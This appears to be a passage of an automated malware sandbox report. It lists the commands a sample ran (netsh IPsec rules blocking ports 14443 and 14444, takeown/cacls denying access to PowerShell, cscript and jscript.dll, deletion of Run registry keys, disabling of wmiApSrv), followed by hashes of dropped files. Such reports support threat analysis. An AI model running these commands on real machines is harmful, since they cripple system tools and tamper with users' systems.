- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion13⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N3⤵
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N3⤵
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N3⤵
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N3⤵
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N3⤵
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.exe"C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f3⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" stop wmiApSrv3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled3⤵
- Launches sc.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\6d7fec.rbsFilesize
2KB
MD5bf1968bc94f17d95a92a455628ee6743
SHA1167464919c0aee6ae86e47b18195e35e1c71a021
SHA2563517ade5c320ec47906610b37ff3d44ad8a3067bf072d6340c36038dff92045f
SHA512c39a90960c15578244c4895ca2ac2413e534e9715f451fc095f321a968909cb215f8c056a95ce8680a307ec27f9addbef70a59231601e9960275fb44aaed669e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXIUJR1DIL91AHIKXB3V.tempFilesize
7KB
MD533a11398a63f9881fbf2fdec1a52623f
SHA1cdf70725703a40ba069933712b63dc7e40baac15
SHA256ea4d707dbdce89be0b9fa8655d5ab85c6ef8891bcc730e03100f35fa426be480
SHA51227bdb922db33d89e0c014823d6b0bd77d9006c75059143f53873e3dd52924bacb6cf49fdcd7d0911f588369874a5962f695b5330a4ec15217251dbd3cf886180
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD533a11398a63f9881fbf2fdec1a52623f
SHA1cdf70725703a40ba069933712b63dc7e40baac15
SHA256ea4d707dbdce89be0b9fa8655d5ab85c6ef8891bcc730e03100f35fa426be480
SHA51227bdb922db33d89e0c014823d6b0bd77d9006c75059143f53873e3dd52924bacb6cf49fdcd7d0911f588369874a5962f695b5330a4ec15217251dbd3cf886180
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD533a11398a63f9881fbf2fdec1a52623f
SHA1cdf70725703a40ba069933712b63dc7e40baac15
SHA256ea4d707dbdce89be0b9fa8655d5ab85c6ef8891bcc730e03100f35fa426be480
SHA51227bdb922db33d89e0c014823d6b0bd77d9006c75059143f53873e3dd52924bacb6cf49fdcd7d0911f588369874a5962f695b5330a4ec15217251dbd3cf886180
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD533a11398a63f9881fbf2fdec1a52623f
SHA1cdf70725703a40ba069933712b63dc7e40baac15
SHA256ea4d707dbdce89be0b9fa8655d5ab85c6ef8891bcc730e03100f35fa426be480
SHA51227bdb922db33d89e0c014823d6b0bd77d9006c75059143f53873e3dd52924bacb6cf49fdcd7d0911f588369874a5962f695b5330a4ec15217251dbd3cf886180
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD533a11398a63f9881fbf2fdec1a52623f
SHA1cdf70725703a40ba069933712b63dc7e40baac15
SHA256ea4d707dbdce89be0b9fa8655d5ab85c6ef8891bcc730e03100f35fa426be480
SHA51227bdb922db33d89e0c014823d6b0bd77d9006c75059143f53873e3dd52924bacb6cf49fdcd7d0911f588369874a5962f695b5330a4ec15217251dbd3cf886180
-
C:\Windows\Installer\MSI7012.tmpFilesize
2.9MB
MD520bec50362e877fa5935cb1fc67012f9
SHA1e437f0934a4715bde47367e8a424ae5fe6040e2f
SHA256dbf87a5fcbfb1c8fd567e3c7a2103e63ad62422a0cc7d1ea64a265364ecfb3ba
SHA51249dc81b3e84c189f18b599980e15b970a05152d4c91ef2125ac045005f4a7e2f74a6120a23faed814d297784a5c197d3c0b8ec59125f8172f1111a9fe9a9fad3
-
C:\Windows\Installer\MSI7B78.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
C:\Windows\Installer\MSI7C73.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
C:\Windows\Installer\MSI7DEA.tmpFilesize
537KB
MD5d7ec04b009302b83da506b9c63ca775c
SHA16fa9ea09b71531754b4cd05814a91032229834c0
SHA25600c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4
SHA512171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c
-
C:\Windows\Installer\MSI7E87.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
C:\Windows\Installer\MSI7E87.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\Windows\Installer\MSI7B78.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\Windows\Installer\MSI7C73.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
\Windows\Installer\MSI7DEA.tmpFilesize
537KB
MD5d7ec04b009302b83da506b9c63ca775c
SHA16fa9ea09b71531754b4cd05814a91032229834c0
SHA25600c0e19c05f6df1a34cc3593680a6ab43874d6cd62a8046a7add91997cfabcd4
SHA512171c465fe6f89b9e60da97896990d0b68ef595c3f70ee89b44fcf411352da22a457c41f7b853157f1faa500513419e504696775eefabe520f835ce9be5f4081c
-
\Windows\Installer\MSI7E87.tmpFilesize
379KB
MD5305a50c391a94b42a68958f3f89906fb
SHA14110d68d71f3594f5d3bdfca91a1c759ab0105d4
SHA256f89c4313f2f4bc8654a7fa3697702e36688e8c2756df5ada209a7f3e3f1d906f
SHA512fcad17ce34e35de6f0c7259e92acc842db2e68008cf45e628b18d71cb3bffcfca35e233cd8ae5eb2ae758b8a6503dbe832dd70038432ccbd56c99cd45da535f7
-
memory/268-107-0x00000000027C0000-0x0000000002800000-memory.dmpFilesize
256KB
-
memory/268-118-0x00000000027C0000-0x0000000002800000-memory.dmpFilesize
256KB
-
memory/1156-59-0x00000000027A0000-0x00000000027E0000-memory.dmpFilesize
256KB
-
memory/1156-58-0x00000000027A0000-0x00000000027E0000-memory.dmpFilesize
256KB
-
memory/1628-54-0x0000000000020000-0x000000000003F000-memory.dmpFilesize
124KB